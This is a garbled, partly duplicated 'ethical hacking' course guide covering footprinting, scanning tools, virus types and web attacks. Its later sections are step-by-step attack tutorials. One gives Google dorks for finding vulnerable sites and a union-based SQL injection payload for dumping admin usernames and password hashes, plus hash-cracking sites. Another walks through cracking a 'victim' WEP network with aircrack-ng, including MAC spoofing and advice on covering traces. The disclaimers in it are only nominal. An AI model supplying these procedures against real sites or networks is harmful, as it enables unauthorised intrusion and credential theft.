Professional Documents
Culture Documents
Study Guide
Introduction
Welcome to the exciting world of Elysium certification program! You have picked up
this book because you want something better in career. Elysium assured to give better
technology update through this. And you have made a good decision to do career certification
in Elysium and we can help you get your best networking job, or more money and a
promotion if you are already in the field. Cisco certification can also improve your
understanding of the internetworking of more than just Cisco products: You will develop a
complete understanding of networking and how different network topologies work together
to form a network. This is beneficial to every networking job and is the reason Elysium
teaching is in such high demand, even at companies with few Cisco devices.
Attackers break into systems for various reasons and purposes. Therefore, it is important to
understand how malicious hackers exploit systems and the probable reasons behind the
attacks.
This module starts with an overview of the current security scenario and emerging threat
vectors. It provides an insight into the different elements of information security.
Module Flow
1.
2.
3.
4.
5.
6.
database to crash. As a result, developers and users were unable to upload or download any
applications.
There is a very thin line difference between the hacker and cracker. Like a coin has two faces
heads or tails, similar is true for computer experts. Some uses their techniques and expertize
to help the others and secure the systems or networks and some misuses them and use that for
their own selfish reasons.
There are several traditional ways that determines the difference between the hackers and
crackers. In this book we will provide you these ways in order of their acceptance in the
computer and IT market. First of all, let me provide you the basic definitions of both hackers
and crackers.
Crackers:
called criminals because they are having the mind-set of causing harm to security and they
steals very useful data and use it in wrong ways. Phishers also come in this category who
steals account info and steal your credit card nos. and money over the Net.
Below is the Diagrams which shows the basic difference between cracker or black hat hackers
and Hackers or ethical hackers or white hat hackers.
We hope this will help you to clear most of your doubts about hackers and crackers. And the
most important thing, until and unless an ethical hacker thinks like a cracker you can never
become an expert ethical hacker because to get most out of any computer system you must
understand the mind-set of crackers that what they can do and up to what level they can
damage.
Now when you will identify the vulnerabilities and loopholes, If you fixes them so that in
future anyone cannot breach that same vulnerability then you are Hacker or ethical hacker or
White Hat hacker and if you utilize that loophole of misdeeds or for fun then its cracking or
Black hat hacking. And black hat hackers are intelligent peoples but criminals or simply
cyber cops call them evil genius.
But you can also give a try to Matriux Operating System and knoppix, Matriux OS is just
awesome but its still under construction as designers are still working on it and patching it.
Now lets discuss more about functionality of Backtrack operating system.
BackTrack features the latest in security penetration software. The current Linux
kernel is patched so that special driver installation is unnecessary for attacks. For
example, an Atheros-based wireless networking adapter will no enter monitor mode
or inject packets without the MadWiFi driver patch. With BackTrack, you dont need
to worry about that. Its just plug-and-play ready-to-go!
Whats great is that this Linux distribution comes Live-on-CD. So, no installation is
needed. However, what you experience BackTrack, you will realize that it is a must to
download this operating system and install it on your Laptop. At the very least,
download the VMWare Virtual Appliance for Backtrack. Make sure you also install
the VMWare Tools for Linux as well. Many features will still work in VMWare mode.
Origin: Switzerland
Architecture: i386
Cost: Free
Hacking Tools:
BackTrack provides users with easy access to a comprehensive and large collection of
security-related tools ranging from port scanners to password crackers. Support for
Live CD and Live USB functionality allows users to boot BackTrack directly from
portable media without requiring installation, though permanent installation to hard
disk is also an option.
BackTrack includes many well known security tools including:
Metasploit integration
Kismet
Nmap
Ettercap
Information Gathering
Network Mapping
Vulnerability Identification
Privilege Escalation
Maintaining Access
copyright 2016 EAPL
Digital Forensics
Reverse Engineering
Voice Over IP
What Is FOOTPRINTING?
Basically footprint is the blueprints of site/organisation/system that a hacker want to Hack i.e
basic internal structure.Footprinting is the blueprint of the security profile of an
organization, undertaken in a methodological manner.
Footprinting is one of the three pre-attack phases. The others are scanning and enumeration.
Important Thing to be Noted : An attacker will spend 90% of the time in profiling an
organization and another 10% in launching the attack.
Footprinting results in a unique organization profile with respect to networks
(Internet/intranet/extranet /wireless) and systems involved.Dont It look amazing
The most interesting stage of a targeted attack is the reconnaissance, or footprint analysis.
Here you use the web, search engines, whois.com, to discover as much about the target as
possible. A whois.com can tell you email address formats for instance (first letter last name @
company.com).
A Google search could reveal submission to forums by security personnel that reveal brands
of firewall or antivirus in use at the target. Sometimes network diagrams are even found that
can guide an attack. The next stage, scanning, meant using special tools, ( I date myself by
mentioning Cybercop and Internet Security Scanner, these were the days before the open
source Nessus) to discover open ports, services, and machines on the target network. And
then, finally, you could start attacking various vulnerabilities that you had discovered.
SITES THAT HELP IN FOOTPRINTING!
1. www.whois.domaintools.com
Now How It can Help You To GET
10
2. Now you can use this information to search more about Person using Simply google as
shown in next snapshot..
copyright 2016 EAPL
11
Now Its on you need How much info u want to explore about the person and website which u
want to hack
12
I think you all Will Like Thisss. WE will continue Our Discussion on FOOTPRINTING
tomorrow
also
As
It
is
the
Most
Important
Phase..
We will Explore More Information in the Next class. I will explain Few More interesting
facts and information exploring things so read on
UNEARTHING BASIC INFORMATION
First of all We will focus on Unearthing the Basic Information about the site i.e the IP and
server informations..
I will Show you with the help on snapshots :
First go to START > RUN >type cmd>then type tracert www.websitename.com
Here we will use two basic commands in command Prompt(cmd): tracert
www.webistetobeanlysed.com
and ping www.websitename.com
It will look something like this:
We
trace
routed
www.amulive.com
1.
Shows
Our
Gateway
of
connectivity.
2. Shows our Outgoing Footprint Ip(i.e the our IP that is being analyzed by website)
3. Shows Connectivity passes through which service Provider. I uses BSNL but its showing
airtel
because
I
prefer
DNS
of
Airtel
for
surfing
Quick).
Next steps showing the Ips of Webservers through which amulive is being maintained.
After This We will came to now the IP of the Website and Ip of itz web servers which are
being
used
further.
website Ip can be used to gather more information about the website..
13
How to Find The Personal Information About the Individual Over Net ??
Its one of the Most important task. Its also helpful in finding the fake profiles But
unfortuantely this is limited But we can use it to the Most There are two website which
will help us
1. http://people.yahoo.com ( best Site To trace People for their Personal Information and also
reverse Phone or mobile number Look up)
14
Now Using these Sites you will be able to collect the personal information of the individuals
and also being able to identify the fake profiles..
SpiderFoot is a free, open-source, domain footprinting tool. Given one or multiple domain
names (and when I say domains, Im referring to the DNS kind, not Windows domains), it
will scrape the websites on that domain, as well as search Google, Netcraft, Whois and DNS
to build up information like:
Subdomains
Affiliates
Web server versions
Users (i.e. /~user)
Similar domains
copyright 2016 EAPL
15
Email addresses
Netblocks
Whois
Nslookup
ARIN
Neo Trace
VisualRoute Trace
SmartWhois
eMailTrackerPro
Website watcher
Google Earth
GEO Spider
HTTrack Web Copier
E-mail Spider
This is all about Footprinting . Now Use the Gathered information to make basic
Detailed Information about the Website/person
16
17
We will prefer TOOLS for this because they will reduce our Hectic Work The first Tool
that we Use is the NMAP :
DOWNLOAD :http://nmap.org/dist/nmap-5.00-setup.exe
18
Features of NMAP :
~ Nmap is used to carry out port scanning, OS detection, version detection, ping sweep, and
many other techniques.
~ It scans a large number of machines at one time.
~ It is supported by many operating systems.
~ It can carry out all types of port scanning techniques.
SECOND TOOL IS NET TOOLS 5.0.70 :
Itz is a collection of various Networking Tools must for beginners
DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html
19
20
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
21
What is Vulnerability???
As I have Told in First class that Vulnerability is weakness in the network,system,database
etc We can call vulnerability as the Loophole i.e through which victim can be attacked.. We
first analyze the loophole and then try to use it to best to Hack the System of victim or
oraganisation or website
TOOL THAT WE USE FOR VULNERABILITY SCANNING ARE :
1. Nessus
2. Retina
NESSUS
The Nessus vulnerability scanner, is the world-leader in active scanners, featuring high
speed discovery, configuration auditing, asset profiling, sensitive data discovery and
vulnerability analysis of your security posture. Nessus scanners can be distributed throughout
an entire enterprise, inside DMZs, and across physically separate networks.
22
Features:
~ Plug-in-architecture
~ NASL (Nessus Attack Scripting Language)
~ Can test unlimited number of hosts simultaneously
~ Smart service recognition
~ Client-server architecture
~ Smart plug-ins
~ Up-to-date security vulnerability database
SAMPLE SNAPSHOT:
23
DOW
NLOAD NESSUS :
http://www.nessus.org/download/
RETINA
Retina Network Security Scanner, the industry and government standard for multi-platform
vulnerability management, identifies known and zero day vulnerabilities plus provides
security risk assessment, enabling security best practices, policy enforcement, and regulatory
audits.
copyright 2016 EAPL
24
Features:
~ Retina network security scanner is a network vulnerability assessment scanner.
~ It can scan every machine on the target network, including a variety of operating system
platforms, networking devices, databases, and third party or custom applications.
~ It has the most comprehensive and up-to-date vulnerability database and scanning
technology.
SAMPLE SNAPSHOT:
25
DOWNLOAD RETINA:
http://www.eeye.com/html/products/retina/download/index.html
Now After Scanning the Systems for Vulnerabilites .. We will Now Going to attack the
Systems but before this we should know the Risk . This risk can be reduced to great extent by
using Proxies.. In Next Class We will Discuss what are Proxies and How they work and how
they are going to Help us and some undetectable and untraceable Proxy servers
Definition of scanning
Types and objectives of Scanning
Understanding Scanning methodology
Checking live systems and open ports
Understanding scanning techniques
Different tools present to perform Scanning
Understanding banner grabbing and OS fingerprinting
Drawing network diagrams of vulnerable hosts
Preparing proxies
26
~ Understanding anonymizers
~ Scanning countermeasures
Operating system
System Architecture
27
I want to Define These Terms here Only as they are of great use in further tutorial
PORT SCANNING : There are 64k ports in a computer out of which 1k are fixed for
system or OS services. In Port scanning we scan for the open Ports which can be used to
attack the victim computer.
In Port scanning a series of messages sent to break into a computer to learn about the
computers network services. Through this we will know that which port we will use to
attack the victim..
Network Scanning : Network scanning is basically a procedure of finding the active
hosts on the Network.
i.e We tries to find that system is standalone or multiuser
This is done either for the purpose of attacking them or for network security assessment
i.e how secured the network Is ??
Vulnerability Scanning : As from the name , In this type of scanning We scan the
systems for finding the vulnerability i.e the weakness in OS/database Once we find the
vulnerability or loop hole we can utilize it to Best..and attack the victim through that
OBJECTIVES OF SCANNING
These are Primary objectives of scanning i.e why do we do scanning :
~ To detect the live systems running on the network.
~ To discover which ports are active/running.
~ To discover the operating system running on the target system (fingerprinting).
~ To discover the services running on the target system.
~ To discover the IP address of the target system.
We will prefer TOOLS for this because they will reduce our Hectic Work The first Tool
that we Use is the
NMAP :
DOWNLOAD :http://nmap.org/dist/nmap-5.00-setup.exe
Features of NMAP :
~ Nmap is used to carry out port scanning, OS detection, version detection, ping sweep,
and many other techniques.
~ It scans a large number of machines at one time.
~ It is supported by many operating systems.
28
29
I thisnk thats Enough for Today .We will discuss more on scanning tomorrow Until You
try these tools..
If you have any problem in Using these tools then you can ask me ..I will help you use
these tools
30
VIRUSES:
Virus is a self-replicating program that produces its own code by attaching copies of itself
into other executable codes like executive files(.exe) ,Dynamic link Librarys(.dlls) etc..
Virus Generally operates in the background and offcourse without the Desire of the User as
Noone want that virus to harm their computer..ROFL :P
Some Well-known Characteristics of Viruses:
Resides in the memory and replicates itself while the program where it attached is
running
Does not reside in the memory after the execution of program
Can transform themselves by changing codes to appear different
copyright 2016 EAPL
31
32
Fig: Infection Phase that how file is attached to .exe files to infect Programs.
Fig: Attack Phase that how the Files are got Fragmented and system speed Slows Down
33
Research projects (People Doing Research Work Detect the Flaws in particular
system and creates Code for that)
Pranks(Just for fun like us people who just creates viruses for irritating frens)
Vandalism
To attack the products of specific companies (like Microsoft Products
Xp,Vista,Windows 7 etc.)
To distribute political messages
Financial gain(Stealing Money from accounts etc..)
Identity theft
Spyware (to Monitor the Working of Remote Computers)
If the system acts in an unprecedented manner, you can suspect a virus attack that
is Processes take more resources and are time consuming than previous i.e System hangs
frequently
Some More are mentioned Below:
If computer beeps with no display
If one out of two anti-virus programs report virus on the system
If the label of the hard drive change
Your computer freezes frequently or encounters errors
Your computer slows down when programs are started
You are unable to load the operating system
Files and folders are suddenly missing or their content changes
Your hard drive is accessed too often (the light on your main unit flashes rapidly)
Microsoft Internet Explorer freezes
Your friends mention that they have received messages from you but you never sent
such messages
34
Most of us thinks that worms are viruses and their working is similar to viruses but this not
the real scenario. There is a Big difference between the general viruses and Worms.
A worm is a special type of virus that can replicate itself and use memory, but cannot
attach itself to other programs. A worm spreads through the infected network
automatically but a virus does not.
How To Detect Your System is Infected by Virus??
This is one of the major question to answer and the simplest answer to it is that there are
some General Indications that Indicates that System is infected or Not.
General Indications are stated Below:
Programs take longer to load than normal (because virus halts the normal working of
programs as it attaches itself to it, so the execution time increases) .
Computers hard drive constantly runs out of free space.
Files have strange names which are not recognizable.
Programs act erratically (Programs Gives errors on use)
Resources are used up easily (can be Easily viewed using task manager).
Loads itself into memory and checks for executable on the disk.
Appends the malicious code to a legitimate program which is Important to the user.
Since the user is unaware of the replacement, he/she launches the infected program.
As a result of the infected program being executes, other programs get infected as
well.
5. The above cycle continues until the user realizes the anomaly within the system.
35
The life cycle indicated above is a general life cycle of the Virus from design Phase to
Elimination phase
VIRUS CLASSIFICATION TYPES OF VIRUSES
Viruses are classified on the basis of two basic Things:
1. What they Infect
2. How they infect
Examples:
System Sector or Boot Virus:
- Infects disk boot sectors and records.
File Virus:
-
Macro Virus:
- Infects documents, spreadsheets and databases such as word, excel and
access. Source Code
36
Virus:
-
Stealth Virus
These viruses evade anti-virus software by intercepting its requests to the operating system.
A virus can hide itself by intercepting the anti-virus softwares request to read the file and passing the
request to the virus, instead of the OS. The virus can then return an uninfected version of the file to
the anti-virus software, so that it appears as if the file is clean.
Self-Modification Virus
Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them
for virus signatures.
A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses.
Self-modification viruses employ techniques that make detection by means of signatures difficult or
impossible. These viruses modify their code on each infection. (each infected file
contains a different variant of the virus)
37
A well-written polymorphic virus therefore has no parts that stay the same on each infection.To enable
polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or
mutation engine). Polymorphic code is a code that mutates while keeping the original algorithm intact.
Metamorphic Virus
Metamorphic viruses rewrite themselves completely each time they are to infect new executables.
Metamorphic code is a code that can reprogram itself by translating its own code into a temporary
representation, and then back to normal code again.
For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it is part of the
metamorphic engine.
38
39
you ignores the alert and keep the keygen means trojan running.
NOTE: And Guys an important note for you all, If your antivirus doesnt show any keygen
or crack as a virus then dont ever think that its not a virus but its a most dangerous
thing. Why dangerous because now Hacker has used some more brain to fool you that is
he has made the virus undetectable simply edit the hex code of original virus. So what is
the moral of story Please dont use cracked versions.
Now you all be thinking that if we dont use the cracked versions then how we will able
to get full versions of the softwares. Dont worry when I am there no fear drink beer and
enjoy everything for free. Its solution will be in solutions step just read article.
2. Pen drive or USB drive :
The biggest cause of infection of your system is usb drives and external hard disks.
Now how a virus enters into your system using USB drives. You have connected your
USB drive to your friends computer and by chance (sorry its for sure i.e 100%) your
friends system is infected by virus or Trojans and its the property of Virus that it
replicates itself using memory. So when you connect your USB to your friends computer
your USB is now infected by virus and now when you connect this USB to your PC using
the property of your Windows that it searches the files in Newly connected device and
autorun the device and for doing this it loads the index of your USBs file system into
Memory and now if USB has virus its the property of virus its replicates itself using
system memory. Now if you are using good antivirus , your antivirus will pop warning
and alert messages and some times you ignores them means your system is also
infected. For USB drive virus solution keep reading article.
3. Downloading things from Unknown Sites:
Most of the users searches for thing over the internet and where ever they find their
desired result means file that they want they start downloading that from that site only.
Now how it affects your system suppose you want to download any wallpaper say Katrina
Kaif. Now hackers know the fact that Katrina has a huge fan following and user will
surely going to download it. Then what they do they simply bind their malicious codes
with some of files and when users download it his system is infected and he can never
imagine that the virus has come from wallpaper that he has downloaded from unknown
site. For its solution read on article.
4. The most important one Becoming a Hacker like Me (ROFL but its truth).
Why I have mentioned this you might be clear from the above discussion. Most of the
internet users always curious to know ways how can i hack my friends email account or
his system for these they download all type of shit from the internet and believe me
99.9% of this shit contains viruses and Trojans that sends your information to the
providers. Now I dont say that stop hacking but try to follow some basic steps to learn
hacking and first of all you must know how to protect yourself from such type of fake
softwares. For its solution read on article.
40
Now after discussing the things How you system is got infected by your simple
negligence. Its time You should Know How to fix them and protect your system from all
types of viruses and trojans.
Best Free Anti-Spyware: Spyware Terminator with crawler Web security toolbar.
Download It for free :
41
http://www.filehippo.com/download_spyware_terminator/
Install spyware terminator with web security tool bar . Now your following problems are
being solved:
1. No Trojan can attack you.
2. Protection from Malicious websites and much more..
42
The solution of this problem is already provided Web browser Security toolbar will help
you in surfing only secured and genuine websites and if you want to visit and download
Virus Total will help you to identify the file whether its infected or not.
43
And for the fourth point that you should be expert in removing traces . For this you can refer
to first 5 hacking classes and specially read these two
1. Hiding Yourself from being traced.
copyright 2016 EAPL
44
As we know traces are very important. Please dont ignore them otherwise you can be in big
trouble for simply doing nothing. so please take care of this step.
1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY.
1. SQL INJECTION
First of all what is SQL injection? SQL injection is a type of security exploit or loophole in
which a attacker injects SQL code through a web form or manipulate the URLs based on
SQL parameters. It exploits web applications that use client supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that
are concatenated with SQL commands and executed. A less direct attack injects malicious code into
strings that are destined for storage in a table or as metadata. When the stored strings are
subsequently concatenated into a dynamic SQL command, the malicious code is executed.
45
4. And most important expertize in removing traces otherwise u have to suffer consequences.
Now First two things you can learn from a very famous website for basics of Website design
with basics of HTML,SQL,PHP and javascript.
http://www.w3schools.com/
And for the fourth point that you should be expert in removing traces . For this you can refer
to first 5 hacking classes and specially read these two
1. Hiding Yourself from being traced.
2. Removing your Traces
As we know traces are very important. Please dont ignore them otherwise you can be
in big trouble for simply doing nothing. so please take care of this step.
1. SQL INJECTION
First of all what is SQL injection? SQL injection is a type of security exploit or
loophole in which a attacker injects SQL code through a web form or manipulate
the URLs based on SQL parameters. It exploits web applications that use client
supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that
are concatenated with SQL commands and executed. A less direct attack injects malicious code into
strings that are destined for storage in a table or as metadata. When the stored strings are
subsequently concatenated into a dynamic SQL command, the malicious code is executed.
46
are very popular and some of the biggest websites have been affected by them
including the FBI, CNN, Ebay, Apple, Microsft, and AOL.
Some website features commonly vulnerable to XSS attacks are:
Search Engines
Login Forms
Comment Fields
Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side
security mechanisms normally imposed on web content by modern browsers. By finding ways of
injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive
page content, session cookies, and a variety of other information maintained by the browser on behalf
of the user. Cross-site scripting attacks are therefore a special case of code injection.
I will explain this in detail in later hacking classes. So keep reading..
Code execution on the client-side such as Javascript which can lead to other attacks such as
cross site scripting (XSS).
Data Theft/Manipulation
5. DDOS ATTACK
copyright 2016 EAPL
47
Simply called distributed denial of service attack. A denial-of-service attack (DoS attack)
ordistributed denial-of-service attack (DDoS attack) is an attempt to make a computer
resource unavailable to its intended users. Although the means to carry out, motives for, and targets of
a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an
Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In DDOS
attack we consumes the bandwidth and resources of any website and make it unavailable to its
legitimate users.
For more detailed hack on DDOS visit:
6.EXPLOTING VULNERABILITY
Its not a new category it comprises of above five categories but i mentioned it separately because there
are several exploits which cannot be covered in the above five categories. So i will explain them
individually with examples. The basic idea behind this is that find the vulnerability in the website and
exploit it to get the admin or moderator privileges so that you can manipulate the things easily.
SQL INJECTION
Hello friends in my previous class of How to hack websites, there i explained the
various topics that we will cover in hacking classes. Lets today start with the first
topic Hacking Websites using SQL injection tutorial. If you have missed the previous
hacking class dont worry read it here.
So guys lets start our tutorial of Hacking Websites using SQL injection technique.
First of all, i will provide you the brief introduction about SQL injection.
Note: This article is for Educational Purposes only. Please Dont misuse
it. Isoftdl and me are not responsible of any misuse done by you.
MySQL database is very common database system these days that websites use and
you will surprise with the fact that its the most vulnerable database system ever.Its
48
has unlimited loopholes and fixing them is a very tedious task. Here we will discuss
how to exploit those vulnerabilities manually without any tool.
inurl:index.php?id=
inurl:trainers.php?id=
49
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
Search google for more google dorks to hack websites. I cannot put them on my
website as they are too critical to discuss. We can discuss them in comments of this
posts so keep posting and reading there.
50
h**p://www.site.com/products.php?id=7
h**p://www.site.com/products.php?id=7
On executing it, if we get an error like this: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
etcOr something like that, that means the target website is vulnerable to sql
injection and you can hack it.
51
So we have
Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33log or 5.0.45 or similar.
52
i.e.
common column names are: username, user, usr, user_name, password, pass,
passwd, pwd etc
i.e would be
copyright 2016 EAPL
53
(we see number 2 on the screen like before, and thats good )
(if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc
(if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database
is set up
i.e md5 hash, mysql hash, sha1
Now we must complete query to look nice
For that we can use concat() function (it joins strings)
i.e
h**p://www.site.com/products.php?id=5 union all select
1,concat(username,0x3a,password),3 from admin/*
Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
copyright 2016 EAPL
54
7). MySQL 5
Like i said before im gonna explain how to get table and column names
in MySQL greater than 5.
For this we need information_schema. It holds all tables and columns in database.
i.e
55
Here we replace the our number 2 with table_name to get the first table from
information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all
tables.
i.e
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e
i.e
Keep incrementing until you get some useful like db_admin, poll_user, auth,
auth_user etc
56
ie.
The second column is displayed, so keep incrementing until you get something like
i.e
Now we get displayed column name in table users. Just using LIMIT we can list all
columns in table users.
Note that this wont work if the magic quotes is ON.
Lets say that we found colums user, pass and email.
copyright 2016 EAPL
57
i.e
Example: admin:hash:whatever@blabla.com
But the passwords are in hash format so we need to crack the hash. Note 90% of hash
are crackable but 10% are still there which are unable to crack. So dont feel bad if
some hash doesnt crack.
58
http://www.milw0rm.com/cracker/insert.php
or
http://passcracking.com/index.php
Password = OwlsNest
STEPS TO HACK WIFI OR WIRELESS PASSWORD
1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers
with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE
2.
Get the victim to attack that is whose password you want to hack or crack.
Now Enter the Backtrack Linux CD into your CD drive and start it. Once its started click on
the black box in the lower left corner to load up a KONSOLE . Now you should start your
Wifi card. To do it so type
airmon-ng
You will see the name of your wireless card. (mine is named ath0) From here on out,
replace ath0 with the name of your card. Now type
then type:
59
then type:
then type:
The above steps i have explained is to spoof yourself from being traced. In above step
we are spoofing our MAC address, this will keep us undiscovered.
Now type:
airodump-ng ath0
All above steps in one screen shot:
60
Now you will see a list of wireless networks in the Konsole. Some will have a better
signal than others and its always a good idea to pick one that has a best signal
strength otherwise it will take huge time to crack or hack the password or you may
not be able to crack it at all.
Once you see the networks list, now select the network you want to hack. To freeze
the airodump screen HOLD the CNTRL key and Press C.
Now you will see something like this:
61
62
Once youve decided on a network, take note of its channel number and bssid. The
bssid will look something like this
00:23:69:bb:2d:of
The Channel number will be under a heading that says CH.
As shown in this figure:
63
64
Now leave this Konsole window up and running and open up a 2nd Konsole window.
In this window type:
This will send some commands to the router that basically it is to associate your
computer even though you are not officially connected with the password. If this
command is successful, you should see about 4 lines of text print out with the last
one saying something similar to Association Successful :-)
If this happens, then good! You are almost there.
Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0
This will generate a bunch of text and then you will see a line where your computer is
gathering a bunch of packets and waiting on ARP and ACK. Dont worry about what
these meanjust know that these are your meal tickets. Now you just sit and wait.
Once your computer finally gathers an ARP request, it will send it back to the router
and begin to generate hundreds of ARP and ACK per second. Sometimes this starts
to happen within secondssometimes you have to wait up to a few minutes. Just be
patient. When it finally does happen, switch back to your first Konsole window and
you should see the number underneath the IV starting to rise rapidly. This is great! It
means you are almost finished! When this number reaches AT LEAST 5,000 then
you can start your password crack. It will probably take more than this but I always
start my password cracking at 5,000 just in case they have a really weak password.
Now you need to open up a 3rd and final Konsole window. This will be where we
actually crack the password.
Now type:
aircrack-ng -b (bssid) (filename)-01.cap
Remember the file name you made up earlier? Mine was Ben. Dont put a space in
between it and -01.cap here. Type it as you see it. So for me, I would type wepkey01.cap
Once you have done this you will see aircrack fire up and begin to crack the
password. typically you have to wait for more like 10,000 to 20,000 IVs before it will
crack. If this is the case, aircrack will test what youve got so far and then it will say
something like not enough IVs. Retry at 10,000.
copyright 2016 EAPL
65
DONT DO ANYTHING! It will stay runningit is just letting you know that it is on
pause until more IVs are gathered. Once you pass the 10,000 mark it will
automatically fire up again and try to crack it. If this fails it will say not enough IVs.
Retry at 15,000. and so on until it finally gets it.
If you do everything correctly up to this point, before too long you will have the
password! now if the password looks goofy, dont worry, it will still work. some
passwords are saved in ASCII format, in which case, aircrack will show you exactly
what characters they typed in for their password. Sometimes, though, the password
is saved in HEX format in which case the computer will show you the HEX
encryption of the password. It doesnt matter either way, because you can type in
either one and it will connect you to the network.
Take note, though, that the password will always be displayed in aircrack with a
colon after every 2 characters. So for instance if the password was secret, it would
be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that
was something like 0FKW9427VF then it would still display as:
0F:KW:94:27:VF
66
Just omit the colons from the password, boot back into whatever operating system
you use, try to connect to the network and type in the password without the colons
and presto! You are in!
It may seem like a lot to deal with if you have never done it, but after a few successful
attempts, you will get very quick with it. If I am near a WEP encrypted router with a
good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal
activity that you do, falls completely on you becausetechnicallythis is just for you
to test the security of your own network.
I hope you all liked it. If you have any queries then ask me.
67